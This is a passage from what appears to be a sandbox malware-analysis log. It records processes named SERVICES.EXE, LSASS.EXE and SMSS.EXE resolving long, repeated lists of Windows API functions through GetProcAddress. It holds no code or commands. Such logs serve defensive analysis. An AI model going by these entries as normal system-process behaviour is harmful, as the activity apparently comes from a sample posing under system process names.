CloseThreadpoolWait (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter OleLoadPictureEx (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter DispCallFunc (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter LoadTypeLibEx (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter UnRegisterTypeLib (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter CreateTypeLib2 (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarDateFromUdate (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarUdateFromDate (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter GetAltMonthNames (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarNumFromParseNum (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarParseNumFromStr (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarDecFromR4 (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarDecFromR8 (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarDecFromDate (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarDecFromI4 (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarDecFromCy (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarR4FromDec (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter GetRecordInfoFromTypeInfo (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter GetRecordInfoFromGuids (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SafeArrayGetRecordInfo (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SafeArraySetRecordInfo (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SafeArrayGetIID (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SafeArraySetIID (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SafeArrayCopyData (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SafeArrayAllocDescriptorEx (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SafeArrayCreateEx (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarFormat (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarFormatDateTime (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarFormatNumber (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarFormatPercent (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarFormatCurrency (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarWeekdayName (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarMonthName (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarCat (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarEqv (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarImp (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarPow (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarAbs (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarFix (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarInt (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarRound (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarDecAdd (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarDecCmp (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarBstrCat (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarCyMulI4 (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter VarBstrCmp (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter CLSIDFromProgIDEx (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SxsOleAut32MapIIDOrCLSIDToTypeLibrary (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter MonitorFromWindow (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter MonitorFromRect (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter MonitorFromPoint (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00001968)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter OleLoadPictureEx (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter DispCallFunc (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter LoadTypeLibEx (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter UnRegisterTypeLib (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CreateTypeLib2 (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarDateFromUdate (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarUdateFromDate (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter GetAltMonthNames (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarNumFromParseNum (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarParseNumFromStr (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarDecFromR4 (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarDecFromR8 (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarDecFromDate (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarDecFromI4 (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarDecFromCy (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarR4FromDec (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter GetRecordInfoFromTypeInfo (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter GetRecordInfoFromGuids (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SafeArrayGetRecordInfo (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SafeArraySetRecordInfo (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SafeArrayGetIID (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SafeArraySetIID (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SafeArrayCopyData (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SafeArrayAllocDescriptorEx (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SafeArrayCreateEx (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarFormat (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarFormatDateTime (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarFormatNumber (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarFormatPercent (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarFormatCurrency (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarWeekdayName (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarMonthName (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarCat (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarEqv (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarImp (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarPow (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarAbs (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarFix (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarInt (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarRound (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarDecAdd (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarDecCmp (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarBstrCat (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarCyMulI4 (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter VarBstrCmp (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter CLSIDFromProgIDEx (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SxsOleAut32MapIIDOrCLSIDToTypeLibrary (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter MonitorFromWindow (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter MonitorFromRect (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter MonitorFromPoint (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00003760)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter OleLoadPictureEx (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter DispCallFunc (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter LoadTypeLibEx (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter UnRegisterTypeLib (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter CreateTypeLib2 (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarDateFromUdate (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarUdateFromDate (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter GetAltMonthNames (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarNumFromParseNum (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarParseNumFromStr (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarDecFromR4 (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarDecFromR8 (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarDecFromDate (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarDecFromI4 (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarDecFromCy (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarR4FromDec (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter GetRecordInfoFromTypeInfo (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter GetRecordInfoFromGuids (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter SafeArrayGetRecordInfo (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter SafeArraySetRecordInfo (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter SafeArrayGetIID (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter SafeArraySetIID (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter SafeArrayCopyData (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter SafeArrayAllocDescriptorEx (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter SafeArrayCreateEx (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarFormat (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarFormatDateTime (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarFormatNumber (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarFormatPercent (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarFormatCurrency (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarWeekdayName (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarMonthName (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarCat (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarEqv (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarImp (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarPow (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarAbs (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarFix (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarInt (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarRound (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarDecAdd (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarDecCmp (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarBstrCat (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarCyMulI4 (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter VarBstrCmp (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter CLSIDFromProgIDEx (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter SxsOleAut32MapIIDOrCLSIDToTypeLibrary (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter MonitorFromWindow (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter MonitorFromRect (UID: 00000000-00005196)\n 